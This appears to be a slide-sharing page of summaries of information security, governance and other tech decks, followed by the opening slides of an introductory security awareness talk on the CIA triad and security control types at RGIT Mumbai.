The document discusses information security and privacy in the public sector. It outlines key concepts like availability, confidentiality, privacy, and integrity of public information. It also discusses information security, ensuring data integrity, confidentiality and availability. The document then examines information privacy and policy instruments like legal/regulatory, economic, technical and information policies to enhance security. It identifies challenges like safeguarding sensitive data, protecting IT systems, and ensuring leadership credibility. The document concludes with recommendations for implementing secure and transparent government through effective policies, procedures, organizational structures and security programs.
The document discusses the history and evolution of information security. It begins with physical security controls for early mainframe computers and the need for security on the ARPANET network. Information security expanded to include data security and limiting unauthorized access. With the growth of networks and the internet, security became more complex as many interconnected systems needed to be secured. The document outlines key information security concepts and professionals involved in information security governance.
We live in a digital world in which our happiness, health, and even our lives can depend on the performance of technology. From medical equipment to cars, and home security systems to smartphones, computerized equipment plays a greater role in the human experience with each passing year.
This document provides an overview of information security. It defines information and discusses its lifecycle and types. It then defines information security and its key components - people, processes, and technology. It discusses threats to information security and introduces ISO 27001, the international standard for information security management. The document outlines ISO 27001's history, features, PDCA process, domains, and some key control clauses around information security policy, organization of information security, asset management, and human resources security.
The state of being protected against the unauthorized use of information, especially electronic data, or the measures taken to achieve this.
"the growing use of mobile applications is posing a risk to information security"
Developing an Information Security Program (by Shauna_Cox)
The document discusses the components and development of an effective information security program. It outlines that an information security program is needed due to factors like regulatory requirements, sophisticated attacks, and the strategic importance of security. The key components of an effective program include executive commitment, policies and procedures, monitoring processes and metrics, governance structure, and security awareness training. The document also describes standard methodologies and outlines the typical development process of plan, implement, operate and maintain, and monitor and evaluate.
This slide deck provides various details regarding information security: the database and its advantages, DBMS and RDBMS, IS design considerations, various cybercrime techniques, the elements of information (integrity, availability), classification of threats, information security risk assessment, the four stages of risk management, the NIST definition, risk assessment methodologies, the security risk assessment approach, risk mitigation options, categories of controls, technical controls, etc.
Information security focuses on protecting valuable information that will help businesses to succeed in their strategies. Confidentiality, integrity and availability are the three basic objectives of Information Security.
This document provides an overview of information security management based on an ISO approach. It discusses key ISO security categories and controls, including risk management, policy management, security organization management, and others. Sample organizational charts and resources for further information are also included. The document aims to help map strengths and responsibilities to different security areas.
This document provides an overview of information security basics. It discusses how information security aims to prevent unauthorized use, disclosure, alteration or substitution of electronic data through measures that ensure confidentiality, integrity and availability of information. It also outlines some key building blocks of secure systems like identification, authentication, authorization, and integrity. The document describes security processes, attacks against systems, and approaches for prevention, detection and response to security incidents.
This document provides an overview of key concepts in information security. It defines information security, why it is important for businesses, and common information security jobs. It then discusses the history of information security and introduces the CIA triad of confidentiality, integrity and availability. The document outlines the components of risk management and assessment. It also describes different types of security controls including administrative, logical/technical, and physical controls and important principles like separation of duties and least privilege. Finally, it discusses security classification of information.
This document discusses various technologies used for information security, including cloud access security brokers, adaptive access control, virtual private networks, endpoint detection and response solutions, intrusion detection and analysis systems, interactive application security testing, antivirus software, firewalls, audit data reduction, network mapping, password cracking, public key infrastructure, and vulnerability scanning systems. It defines information security as protecting information and systems from unauthorized access, use, disclosure, destruction, modification, or disruption. The conclusion states that information security is an ongoing process involving training, assessment, protection, monitoring, detection, incident response, documentation, and review.
The importance of information security nowadays (by PECB)
Nowadays, living without access to the information of interest at any time and any place, through countless types of devices, has become unimaginable. However, its security has become more important than information access itself. In fact, today information security rules the world! Why?
The document discusses information security frameworks and principles. It introduces the CIA triad of confidentiality, integrity, and availability as key principles of information security. It also outlines standards from NIST and ISO, such as ISO 27002, that define best practices for information security management across various domains.
This document summarizes a security awareness training presentation that covered topics such as why security training is important, 21st century security threats, PCI compliance, security objectives and challenges, data classification, and security responsibilities. It provided examples of security incidents, the costs of data breaches, PCI DSS requirements, and outlined the company's security framework including defenses, controls, and challenges around excessive data retention, vulnerable infrastructure, lack of documentation and logging.
Information Security: Is it an Art or a Science? (by Pankaj Rane)
This document discusses information security and whether it is an art or a science. It begins with definitions of security and information security, focusing on protecting information systems and data. It then provides a brief history of information security, from its origins in code breaking during World War II to the increased threats in the modern internet era. The document outlines key information security concepts like confidentiality, integrity, and availability. It also discusses security services, information states, security countermeasures, and the importance of prevention, detection and response.
This document provides an introduction to information security. It defines information security and outlines its objectives, which include understanding the critical characteristics of information, the comprehensive security model, and approaches to implementation. The document discusses the history of information security and components of an effective information security system. It also describes the security systems development life cycle process and provides key information security terminology.
The document discusses information security and provides an overview of key concepts:
1) It defines information security as protecting information and systems from unauthorized access, use, disclosure, disruption or destruction. Maintaining confidentiality, integrity and availability of information are core principles.
2) Reasons for managing information security are given, including compliance with laws, protecting assets from loss, meeting business requirements and customer demands.
3) Methods for managing security are outlined, including implementing security frameworks, classifying information assets, and establishing roles and processes for ongoing security management. Continual assessment and improvement of security controls is important.
A security awareness presentation created for an audience of senior officials from MTNL (India's foremost telecom PSU). The presentation covers the fundamentals of information security, its evolution, and present-day risks from the IT and telecom infrastructure perspective.
The document outlines an agenda for an information security essentials workshop. It discusses key topics like the principles of information security around confidentiality, integrity and availability. It also covers security governance structures, roles and responsibilities, risk management, information system controls and auditing information security. The objectives are to provide an overview of information security, describe approaches to auditing it, and discuss current trends.
This document is a slide presentation for an introduction to information security course at Illinois Institute of Technology. It begins with an overview of the course objectives and policies. It then provides a history of information security, defining key terms. It discusses approaches to implementing security through a systems development life cycle and the roles of security professionals.
The CIA Triad - Assurance on Information Security (by Bharath Rao)
Confidentiality, Integrity and Availability of Data are the basis for providing assurance on IS Security. This document gives a small overview of the impact of confidentiality, integrity and availability on the data and the need of securing the CIA.
The document discusses the importance of establishing a security policy for an organization. A security policy is a formal statement that outlines the organization's goals, objectives, and procedures for information security. It requires compliance, identifies consequences for non-compliance, and establishes a baseline for minimizing risk. The document outlines the key components of a security policy, including governing policies, technical policies, and guidelines. It also discusses developing a security policy through identifying issues, analyzing risks, drafting language, legal review, and deployment.
Information Security Management. Security solutions copy (by yuliana_mar)
Information Security Management. Introduction.
By Yuliana Martirosyan,
Based on Bel G. Raggad, Information Security Management: Concepts and Practices.
A to Z of Information Security Management (by Mark Conway)
The purpose of information security is to protect an organisation's valuable assets, such as information, intellectual property, hardware, and software.
Through the selection and application of appropriate safeguards or controls, information security helps an organisation to meet its business objectives by protecting its physical and financial resources, reputation, legal position, employees, and other tangible and intangible assets.
In this A to Z I'd like to outline some of the key focus areas for organisations wishing to pursue compliance with the ISO27001 Information Security standard.
This document discusses security management practices, with a focus on information security management. It covers topics such as information classification, security policies, roles and responsibilities, risk management, and security awareness training. Specifically, it provides details on establishing an information classification process, including identifying information assets, analyzing risks, defining classifications, roles for information owners and custodians, and guidelines for classifying information and applications.
The document provides an overview of the Information Security & Risk Management domain for the CISSP certification. It discusses key topics including information security concepts, governance, risk management, information classification, and security controls. The objectives are to understand planning and securing information assets, developing security policies and procedures, conducting risk assessments, and implementing controls to ensure confidentiality, integrity and availability. New requirements for 2012 include project management knowledge and privacy compliance.
What Is Digital Asset Security? What Are the Risks Associated With It? (by SecureCurve)
Security and privacy are crucial elements for protecting digital assets. As the use of technology continues to increase, so does the risk of cyber-attacks and data breaches.
IJERD (www.ijerd.com) International Journal of Engineering Research and Devel... (by IJERD Editor)
The document discusses privacy issues in cloud computing. It defines privacy and describes privacy enhancing technologies (PETs) that can help protect privacy, such as pseudonymization and federated identity management. It also discusses privacy by design, which aims to embed privacy protections directly into technologies. Ensuring privacy in cloud computing requires measures like access controls, protecting against unauthorized access/copying of data, and specifying privacy controls in agreements. Overall privacy is a major challenge for cloud computing due to issues of data governance, security, and differing international regulations.
The document outlines an information security course that covers 5 key objectives: understanding information security basics, legal and ethical issues, risk management, security standards, and technological aspects. It details 5 units that will be covered: Introduction, Security Investigation, Security Analysis, Logical Design, and Physical Design. The Introduction unit defines information security, discusses its importance for organizations, and covers concepts like the CIA triad, NSTISSC security model, securing system components, and the Systems Development Life Cycle.
The document covers security governance, which seeks to mitigate risk and align security with business objectives. It discusses the impact of organizational structure on security and the roles of the CISO in understanding the business, developing security programs, ensuring compliance, and reporting on security.
This is a simple slide deck showcasing why companies need to protect data and classify information, and how Seclore IRM as a platform helps you reach those targets.
This document discusses security as a service (SECaaS) and security governance. It defines SECaaS as outsourcing cybersecurity to the cloud, covering data protection, network security, email security, identification, and data loss prevention. The types of SECaaS include data security, identity and access management, governance, data retention and business continuity planning, and legal compliance. Benefits of SECaaS include access to latest security software and experts, reasonable costs, and facilitated security administration. Security governance is defined as the tools, roles, processes, metrics, and oversight that provide formalized risk management, including access control policies, data classification, and password management. Its main purpose is overseeing cybersecurity teams to prioritize
This document discusses asset security and data classification. It provides biographies of two professionals, Jagbir Singh and Narasimhan Elangovan, who have experience in fields related to information security, risk management, and compliance. It also outlines some best practices for data management, such as creating a data policy, defining roles for data owners and custodians, and maintaining data quality standards.
Remote Access Policy Is A Normal Thing (by Karen Oliver)
This document outlines an access control policy for a healthcare organization. It discusses the importance of access controls and audit controls for maintaining compliance with regulations like HIPAA. Authentication, authorization, and auditing are key components of access control policies. The policy also specifies that employees will only be granted the minimum level of access needed to perform their jobs and that inactive or terminated user accounts will have their access revoked in a timely manner. Role-based access control models and audit trails that track access to patient health information are important parts of the organization's compliance efforts.
Security threats and controls were discussed, including cryptography and access control. An expert trainer profile was provided, detailing qualifications and experience in IT security management and implementation of standards such as ISO 27001, COBIT 5, and ITIL. Key security concepts such as the CIA triad of confidentiality, integrity and availability were explained.
This document discusses security as a service (SECaaS) and security governance. It defines SECaaS as outsourcing cybersecurity such as data protection, network security, and database security to the cloud. Benefits of SECaaS include access to latest security software and qualified personnel at reasonable cost. The document also describes security governance as a set of tools, roles and processes for formal risk management, including access control policies, data classification, and password management. The main purpose of security governance is to oversee cybersecurity teams and prioritize risks according to business needs.
This document discusses information systems security. It begins by defining information systems and noting their importance for strategic advantage and decision making. It then discusses the risks of inadequate security management and the need to ensure integrity and safety of systems. The document goes on to explain basic principles of information security like confidentiality, integrity, availability, and others. It also discusses threats like computer crimes, accidents, vulnerabilities and methods to minimize risks like developing systems correctly, user training, physical security controls, and auditing.
The document discusses the key principles of information security - confidentiality, integrity, and availability (CIA). It provides definitions for each principle and explains their importance. For example, it states that confidentiality prevents unauthorized disclosure of information, integrity ensures accuracy and consistency of data, and availability means systems and information are accessible when needed. The document also introduces common information security concepts like identification, authentication, authorization, and accountability.
The Three Major Goals of Cybersecurity for Business Organizations-precise tes... - Precise Testing Solution
In this pdf post, we’ll discuss and understand what are these three major goals of cybersecurity which every business should have to comply with in their best practices.
The document provides an overview of cyber security, including its importance, key domains and types. It discusses network security, application security, information security, identity management, operational security and other areas. It defines cyber security as protecting networks, devices, programs and data from threats. The document also covers cyber threats, vulnerabilities, cyber warfare, cyber terrorism and the need for critical infrastructure security. It provides examples and details for concepts like the CIA triad of confidentiality, integrity and availability.
Equilibrium Security Methodology 030414 Final v2 - marchharvey
The document discusses assessing and remediating business IT security risks. It states that traditional defenses like firewalls and antivirus software are no longer enough, and that hackers are constantly looking for vulnerabilities. It recommends conducting security assessments to identify weaknesses before hackers do. Once weaknesses are found, organizations should fix them and implement a risk-based security lifecycle of ongoing assessment, remediation, and testing to continuously monitor for new threats. Equilibrium offers IT security services to help identify vulnerabilities, design solutions, and test their effectiveness for clients.
Top Cyber Security Interview Questions and Answers 2022.pdf - Careerera
Cyber security positions have considerably taken the top list in the job market. Candidates vying for elite positions in the field of cyber security certainly need a clear-cut and detailed guide to channeling their preparation for smooth career growth, beginning with getting a job. We have curated the top cyber security interview questions that will help candidates focus on the key areas. We have classified the regularly asked cyber security interview questions here, in this article into different levels starting from basic general questions to advanced technical ones.
Before we move on to the top cyber security interview questions, it is critical to reflect on the vitality of cyber security in our modern times and how cyber security professionals are catering to the needs of securing a safe cyber ecosystem.
The times we live in are defined by the digital transition, in which the internet, electronic devices, and computers have become an integral part of our daily life. Institutions that serve our daily needs, such as banks and hospitals, now rely on internet-connected equipment to give the best possible service. A portion of their data, such as financial and personal information, has become vulnerable to illegal access, posing serious risks. Intruders utilize this information to carry out immoral and criminal goals.
Cyber-attacks have jeopardized the computer system and its arrangements, which has now become a global concern. To safeguard data from security breaches, a comprehensive cyber security policy is needed now more than ever. The rising frequency of cyber-attacks has compelled corporations and organizations working with national security and sensitive data to implement stringent security procedures and restrictions.
Computers, mobile devices, servers, data, electronic systems, networks, and other systems connected to the internet must be protected from harmful attacks. Cybersecurity, which is a combination of the words "cyber" and "security," provides this protection. 'Cyber' covers the wide range of technology involved: systems, networks, programs, and data. The phrase "security" refers to the process of protecting data, networks, applications, and systems. In a nutshell, cyber security is a combination of principles and approaches that help prevent unwanted access to data, networks, programs, and devices by meeting the security needs of technological resources (computer-based) and online databases.
The document discusses cybersecurity governance and the role of the Chief Information Security Officer (CISO). It describes how governance seeks to exercise control and management over an organization to mitigate security risks in a proactive manner. It outlines the various roles and responsibilities in information security, including end users, administrators, security professionals, auditors, and executive management. The CISO role is responsible for developing security policies and procedures, ensuring compliance, managing the security budget, and keeping informed of emerging threats to advise the organization accordingly.
Information security involves protecting information and systems from unauthorized access, use, disclosure, disruption or destruction. It aims to ensure the confidentiality, integrity and availability of information through technical, administrative and physical controls. The most common principles of information security are confidentiality, integrity, availability, authenticity, non-repudiation and accountability. Access controls like identification, authentication and authorization help enforce security policies and protect information based on user roles and permissions. Cryptography also plays an important role through encryption to render data unusable without authorization. Information security requires an ongoing, layered approach to safeguard information throughout its lifecycle.
WFH Cybersecurity Basics Employees and Employers - Dinesh O Bareja
Work from home (WFH) is the new normal. The COVID-19 pandemic has thrown everyone across the world into a struggle (and challenge) for survival. While we stand up to the challenge, we have to set our rules for WFH, with cybersecurity safeguards.
Changes in the world have brought about changes in our lives and at present there are events that are making huge changes. Cyber security demands will also change as we come out into a new world order. We look at skills needed.
Basics in IT Audit and Application Control Testing - Dinesh O Bareja
IT Audit and Application Control Testing are large and complex activities in themselves, and it is my presentation to share the basics here, based on my own experience and using guidance from IIA GTAGs.
Can Cyber Insurance Enforce Change in Enterprise GRC - Dinesh O Bareja
Like all things cyber, insurance holds a lot of hope for risk mitigation. However, again, like all things cyber, there is a lot of unknown in the risk mitigation solution itself.
Finance and Accounting professionals to bridge the gap with IT - Dinesh O Bareja
The document summarizes a presentation given by Dinesh O Bareja on the role of accountancy and finance professionals in bridging the gap between IT departments and stakeholders. It discusses how accountancy and IT professionals have different but critical roles in organizations. It also outlines challenges that can arise between the two groups, such as differences in priorities and communication issues. The presentation provides recommendations on how accountancy professionals can better partner with IT, including understanding technology, participating in budget planning, and ensuring IT investments deliver value and efficiency.
Governance and IoT Cyber Risks - presented at Defcon-OWASP Lucknow, India - Dinesh O Bareja
Internet (or Cyber) Governance has a long way to go and is presently fraught with confusion - this being a global phenomenon. Then there is the Internet of Things coming up at top speed, which means that we have to face up to the risks that come with the convenience! A solution for governance and some insight into the IoT risks were presented at the Defcon-OWASP Conference in Lucknow (India) on February 22, 2015.
The document discusses poor etiquette and lack of personalization that the author has observed in LinkedIn connection requests. The author notes that many connection requests are impersonal copy-paste messages sent indiscriminately. The author believes LinkedIn connections should be managed thoughtfully rather than simply amassing thousands of connections. Quality of connections and personalizing initial messages are emphasized over quantity. The tone is one of frustration with the superficiality observed in many LinkedIn interactions.
This document outlines plans for an Information Security Education (ISE) program consisting of virtual meetings to share knowledge about infosec topics. The program aims to simplify complex infosec concepts using common language. Sessions would be one hour, with a 15-20 minute presentation followed by discussion. Topics would include cybersecurity cases, certifications, incident response, and emerging issues. Presentations must be short, practical, and focus on one topic. The goal is for ISE to become a major infosec knowledge repository in simple terms globally through local presenters and translations.
Common sense is the most important element in Information Security and I am working in the IS domain! So who knows this better than me. The problem is the people (generally) and so many IS clients and professionals do not realize this simple fact.
I am prompted by this knowledge and realization gap to present Common Sense 101 - a compilation of CS resources from all over the net - hoping it makes sense to you and you benefit from it in your practice.
Governance in Cybercrime and Cybersecurity orgns - final distribution Organiz... - Dinesh O Bareja
Cybersecurity and cybercrime organizations must be created with great planning but that is not happening anywhere. In India we have a plethora of organizations sprouting up in every domain and we all know too many cooks spoil the broth. I make a case for governance at the national and state level and make the case for having a planned structure that will ensure good security, good response and offense too, if needed.
Cyberwar and cyberwarfare are on everyone's lips but mean nothing, as they are least understood and still need to be defined! Yet we have everyone who means something standing on the rooftops and rattling their swords. The question is: is India ready? This is explored in the presentation: Indian institutions, cyber practices and the way ahead.
This document provides an overview of an incident response presentation on the topic of "Incident Response Requires Superhumans". It discusses how expectations for incident response have grown exponentially with technology advancement. It outlines some of the multi-faceted skills and expertise required of incident response professionals, including deep technical knowledge across many domains as well as soft skills like communication and working under pressure. The document cautions that developing capable incident response teams is challenging due to the hands-on experience required and calls for continuous learning to address the dynamic nature of the field.
Managing Frequently Overlooked Risks & Threats (FORTS) in Corporations - Dinesh O Bareja
There are many (small) risks and threats which are frequently overlooked in an organization. The presentation takes a look at where Risks & Threats (RaT) come from and at the "Biggies" in the RaT Lists. We look at a few Frequently Overlooked Threats and Risks (FORT) and Course Correction Options, and finally a few Case Studies to highlight FORTs.
Bug bounty programs offer numerous benefits to the sponsoring companies. Government organizations as well as private organizations will benefit if they have bug hunters sniffing around on their network.
The document discusses several issues relating to information security awareness and training. It notes that awareness and training have different objectives and should be treated differently. Living in denial of security risks is common, but can leave organizations over-protected or under-protected. An inadequate response to security incidents can be chaotic with too many people involved and little learning. Indian wisdom emphasizes creating a practical security environment and following plans and policies, rather than crossing limits.
India Top5 Information Security Concerns 2013 - Dinesh O Bareja
Indian Information Security scenario, and the global one too, leaves much to be desired - this report covers concerns about InfoSec in this year. A straightforward document with lots of practical insights about what ails Information and Data Security in Government, Business and Users.
Information Security Management Education Program - Concept Document - Dinesh O Bareja
The document proposes an information security management program to train future security managers. It notes shortcomings in existing education and certification programs. The proposed program would [1] provide practical skills training using real-world scenarios, [2] cover technical, business, audit and legal topics to prepare students for security leadership roles, and [3] include soft skills development and fieldwork opportunities. The program differentiators include an experiential learning lab, partnerships with industry, and mentoring to support career placement.
The document discusses internet security in India. It summarizes that while the internet provides many benefits, it also enables many security threats. The Open Security Alliance (OSA) conducted research on internet security issues facing individual users, organizations, and the government in India. OSA categorized internet users and identified security issues for each group. Their analysis found that India faces unique technology risk issues with a growing internet user population in both urban and rural areas. Proactive strategies are needed to establish security standards and practices through research, education and policy changes.
"Choosing proper type of scaling", Olena Syrota - Fwdays
Imagine an IoT processing system that is already quite mature and production-ready and for which client coverage is growing and scaling and performance aspects are life and death questions. The system has Redis, MongoDB, and stream processing based on ksqldb. In this talk, firstly, we will analyze scaling approaches and then select the proper ones for our system.
How information systems are built or acquired puts information, which is what they should be about, in a secondary place. Our language adapted accordingly, and we no longer talk about information systems but applications. Applications evolved in a way to break data into diverse fragments, tightly coupled with applications and expensive to integrate. The result is technical debt, which is re-paid by taking even bigger "loans", resulting in an ever-increasing technical debt. Software engineering and procurement practices work in sync with market forces to maintain this trend. This talk demonstrates how natural this situation is. The question is: can something be done to reverse the trend?
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency - ScyllaDB
Freshworks creates AI-boosted business software that helps employees work more efficiently and effectively. Managing data across multiple RDBMS and NoSQL databases was already a challenge at their current scale. To prepare for 10X growth, they knew it was time to rethink their database strategy. Learn how they architected a solution that would simplify scaling while keeping costs under control.
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf - Chart Kalyan
A Mix Chart displays historical data of numbers in a graphical or tabular form. The Kalyan Rajdhani Mix Chart specifically shows the results of a sequence of numbers over different periods.
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors - DianaGray10
Join us to learn how UiPath Apps can directly and easily interact with prebuilt connectors via Integration Service--including Salesforce, ServiceNow, Open GenAI, and more.
The best part is you can achieve this without building a custom workflow! Say goodbye to the hassle of using separate automations to call APIs. By seamlessly integrating within App Studio, you can now easily streamline your workflow, while gaining direct access to our Connector Catalog of popular applications.
We’ll discuss and demo the benefits of UiPath Apps and connectors including:
Creating a compelling user experience for any software, without the limitations of APIs.
Accelerating the app creation process, saving time and effort
Enjoying high-performance CRUD (create, read, update, delete) operations, for seamless data management.
Speakers:
Russell Alfeche, Technology Leader, RPA at qBotic and UiPath MVP
Charlie Greenberg, host
"What does it really mean for your system to be available, or how to define w... - Fwdays
We will talk about system monitoring from a few different angles. We will start by covering the basics, then discuss SLOs, how to define them, and why understanding the business well is crucial for success in this exercise.
Conversational agents, or chatbots, are increasingly used to access all sorts of services using natural language. While open-domain chatbots - like ChatGPT - can converse on any topic, task-oriented chatbots - the focus of this paper - are designed for specific tasks, like booking a flight, obtaining customer support, or setting an appointment. Like any other software, task-oriented chatbots need to be properly tested, usually by defining and executing test scenarios (i.e., sequences of user-chatbot interactions). However, there is currently a lack of methods to quantify the completeness and strength of such test scenarios, which can lead to low-quality tests, and hence to buggy chatbots.
To fill this gap, we propose adapting mutation testing (MuT) for task-oriented chatbots. To this end, we introduce a set of mutation operators that emulate faults in chatbot designs, an architecture that enables MuT on chatbots built using heterogeneous technologies, and a practical realisation as an Eclipse plugin. Moreover, we evaluate the applicability, effectiveness and efficiency of our approach on open-source chatbots, with promising results.
This talk will cover ScyllaDB Architecture from the cluster-level view and zoom in on data distribution and internal node architecture. In the process, we will learn the secret sauce used to get ScyllaDB's high availability and superior performance. We will also touch on the upcoming changes to ScyllaDB architecture, moving to strongly consistent metadata and tablets.
Must Know Postgres Extension for DBA and Developer during Migration - Mydbops
Mydbops Opensource Database Meetup 16
Topic: Must-Know PostgreSQL Extensions for Developers and DBAs During Migration
Speaker: Deepak Mahto, Founder of DataCloudGaze Consulting
Date & Time: 8th June | 10 AM - 1 PM IST
Venue: Bangalore International Centre, Bangalore
Abstract: Discover how PostgreSQL extensions can be your secret weapon! This talk explores how key extensions enhance database capabilities and streamline the migration process for users moving from other relational databases like Oracle.
Key Takeaways:
* Learn about crucial extensions like oracle_fdw, pgtt, and pg_audit that ease migration complexities.
* Gain valuable strategies for implementing these extensions in PostgreSQL to achieve license freedom.
* Discover how these key extensions can empower both developers and DBAs during the migration process.
* Don't miss this chance to gain practical knowledge from an industry expert and stay updated on the latest open-source database trends.
Mydbops Managed Services specializes in taking the pain out of database management while optimizing performance. Since 2015, we have been providing top-notch support and assistance for the top three open-source databases: MySQL, MongoDB, and PostgreSQL.
Our team offers a wide range of services, including assistance, support, consulting, 24/7 operations, and expertise in all relevant technologies. We help organizations improve their database's performance, scalability, efficiency, and availability.
Dandelion Hashtable: beyond billion requests per second on a commodity server - Antonios Katsarakis
This slide deck presents DLHT, a concurrent in-memory hashtable. Despite efforts to optimize hashtables, that go as far as sacrificing core functionality, state-of-the-art designs still incur multiple memory accesses per request and block request processing in three cases. First, most hashtables block while waiting for data to be retrieved from memory. Second, open-addressing designs, which represent the current state-of-the-art, either cannot free index slots on deletes or must block all requests to do so. Third, index resizes block every request until all objects are copied to the new index. Defying folklore wisdom, DLHT forgoes open-addressing and adopts a fully-featured and memory-aware closed-addressing design based on bounded cache-line-chaining. This design (1) offers lock-free index operations and deletes that free slots instantly, (2) completes most requests with a single memory access, (3) utilizes software prefetching to hide memory latencies, and (4) employs a novel non-blocking and parallel resizing. In a commodity server and a memory-resident workload, DLHT surpasses 1.6B requests per second and provides 3.5x (12x) the throughput of the state-of-the-art closed-addressing (open-addressing) resizable hashtable on Gets (Deletes).
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba - Fwdays
This is a session that details how PostgreSQL's features and Azure AI Services can be effectively used to significantly enhance the search functionality in any application.
In this session, we'll share insights on how we used PostgreSQL to facilitate precise searches across multiple fields in our mobile application. The techniques include using LIKE and ILIKE operators and integrating a trigram-based search to handle potential misspellings, thereby increasing the search accuracy.
We'll also discuss how the azure_ai extension on PostgreSQL databases in Azure and Azure AI Services were utilized to create vectors from user input, a feature beneficial when users wish to find specific items based on text prompts. While our application's case study involves a drug search, the techniques and principles shared in this session can be adapted to improve search functionality in a wide range of applications. Join us to learn how PostgreSQL and Azure AI can be harnessed to enhance your application's search capability.
AppSec PNW: Android and iOS Application Security with MobSF - Ajin Abraham
Mobile Security Framework - MobSF is a free and open source automated mobile application security testing environment designed to help security engineers, researchers, developers, and penetration testers to identify security vulnerabilities, malicious behaviours and privacy concerns in mobile applications using static and dynamic analysis. It supports all the popular mobile application binaries and source code formats built for Android and iOS devices. In addition to automated security assessment, it also offers an interactive testing environment to build and execute scenario based test/fuzz cases against the application.
This talk covers:
Using MobSF for static analysis of mobile applications.
Interactive dynamic security assessment of Android and iOS applications.
Solving Mobile app CTF challenges.
Reverse engineering and runtime analysis of Mobile malware.
How to shift left and integrate MobSF/mobsfscan SAST and DAST in your build pipeline.
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill - LizaNolte
HERE IS YOUR WEBINAR CONTENT! 'Mastering Customer Journey Management with Dr. Graham Hill'. We hope you find the webinar recording both insightful and enjoyable.
In this webinar, we explored essential aspects of Customer Journey Management and personalization. Here’s a summary of the key insights and topics discussed:
Key Takeaways:
Understanding the Customer Journey: Dr. Hill emphasized the importance of mapping and understanding the complete customer journey to identify touchpoints and opportunities for improvement.
Personalization Strategies: We discussed how to leverage data and insights to create personalized experiences that resonate with customers.
Technology Integration: Insights were shared on how inQuba’s advanced technology can streamline customer interactions and drive operational efficiency.
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application... - Alex Pruden
Folding is a recent technique for building efficient recursive SNARKs. Several elegant folding protocols have been proposed, such as Nova, Supernova, Hypernova, Protostar, and others. However, all of them rely on an additively homomorphic commitment scheme based on discrete log, and are therefore not post-quantum secure. In this work we present LatticeFold, the first lattice-based folding protocol based on the Module SIS problem. This folding protocol naturally leads to an efficient recursive lattice-based SNARK and an efficient PCD scheme. LatticeFold supports folding low-degree relations, such as R1CS, as well as high-degree relations, such as CCS. The key challenge is to construct a secure folding protocol that works with the Ajtai commitment scheme. The difficulty is ensuring that extracted witnesses are low norm through many rounds of folding. We present a novel technique using the sumcheck protocol to ensure that extracted witnesses are always low norm no matter how many rounds of folding are used. Our evaluation of the final proof system suggests that it is as performant as Hypernova, while providing post-quantum security.
Paper Link: https://eprint.iacr.org/2024/257
20100224 Presentation at RGIT Mumbai - Information Security Awareness
1. Rajiv Gandhi Institute of Technology
February 24, 2009
Information Security … the profession;
concepts, risks and more..
Presented by:
Dinesh O Bareja
CISA, CISM, ITIL
Open Security Alliance
(www.opensecurityalliance.org)
2. About Me (Warming Up)
Dinesh Bareja
BA, CISA, CISM, ITIL, BS 7799 (LA, Imp)
Engaged in continuous study and learning
Work in Information Security consulting, advisory and technical services; identifying emerging opportunities; strategic business planning; training, mentoring and awareness & more…
Past life (pre-.com) was spent in manufacturing, trading and exports.
Co-founder of Indian Honeynet Project, Open Security Alliance and actively involved with DSCI and other Information Security groups.
RGIT, Mumbai 02/24 www.opensecurityalliance.org
3. A Starting Thought (Warming Up)
"..... every human endeavour operates partly in light and partly in shadow; and, especially, in those fields that delve deeply into shadow, some succumb to temptation."
- Richard Power (Computerworld)
5. Some more (simpler) thoughts (Warming Up)
• We have sidewalks but cannot walk on them!
• In parks they say … keep off the grass!
• Cars at home… but driving is a killer
• Using computers …. and there is the risk of everything going wrong
• …..
• Rules… rules and more rules!!
6. My Rules (Warmed Up)
• Don't be shy … ask questions (we have a lot of time)
• Feel free to interrupt me
• Nod intelligently even if you fall asleep
• Correct me if I make a mistake (remember I am in a continuous learning mode)
• Hijack this presentation and change it into a debate!
• Don't take notes, this slide deck will be available on our website (or on the college file server)
• There is no test at the end of this session. You get marks for being a good and interactive audience
• Finally – please make sure your cellphones are in shivering mode! It is bad manners to make any odd sounds when people around you are trying to learn something
7. Proposition
• The What and Why of Information Security
• Information Security Domains and Concepts
• Standards, Guidelines and Frameworks
• Infosec Profession / Careers
• Risks and Awareness
8. … What …
Information Security: protecting information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction.
• Confidentiality: Preserving authorized restrictions on access and disclosure, including means for protecting personal privacy and proprietary information.
• Integrity: Guarding against improper information modification or destruction, and includes ensuring information non-repudiation and authenticity.
• Availability: Ensuring timely and reliable access to and use of information.
9. CIA… in more detail
• Confidentiality — Sensitive information must be available only to a set of predefined individuals. Unauthorized transmission and usage of information should be restricted. For example, confidentiality of information ensures that a customer's personal or financial information is not obtained by an unauthorized individual for malicious purposes such as identity theft or credit fraud.
• Integrity — Information should not be altered in ways that render it incomplete or incorrect. Unauthorized users should be restricted from the ability to modify or destroy sensitive information.
• Availability — Information should be accessible to authorized users any time that it is needed. Availability is a warranty that information can be obtained with an agreed-upon frequency and timeliness. This is often measured in terms of percentages and agreed to formally in Service Level Agreements (SLAs) used by network service providers and their enterprise clients.
• Continuity — Information should be continuously available to the business user, and this is ensured through appropriate business continuity and disaster preparedness.
11. Why Information Security
• Ensure Availability of Business
• Take care of the risk of loss of Confidentiality,
Integrity and Availability of Information Assets
• Protect Data and Information Systems
• Brand and Reputation Loss
• Increased Productivity through best practices
• Higher levels of assurance
• Competitive advantage
• Enable Business Continuity and Disaster Recovery
And for this we need Security Controls
12. Security Controls
Computer security controls are commonly divided into three master categories:
– Physical
– Technical
– Administrative
Physical controls are security measures implemented in a defined structure to deter or prevent unauthorized access to sensitive material. Examples of physical controls are:
• Closed-circuit surveillance cameras
• Motion or thermal alarm systems
• Security guards
• Picture IDs
• Locked and dead-bolted steel doors
• Biometrics (fingerprint, voice, face, iris, handwriting and other automated methods used to recognize individuals)
Administrative controls define the human factors of security. They involve all levels of personnel within an organization and determine which users have access to what resources and information, by such means as:
• Training and awareness
• Disaster preparedness and recovery plans
• Personnel recruitment and separation strategies
• Personnel registration and accounting
Technical controls use technology as the basis for controlling access to and usage of sensitive data throughout a physical structure and over a network. Technical controls are far-reaching in scope and encompass such technologies as:
• Encryption
• Smart cards
• Network authentication
• Access control lists (ACLs)
• File integrity auditing software
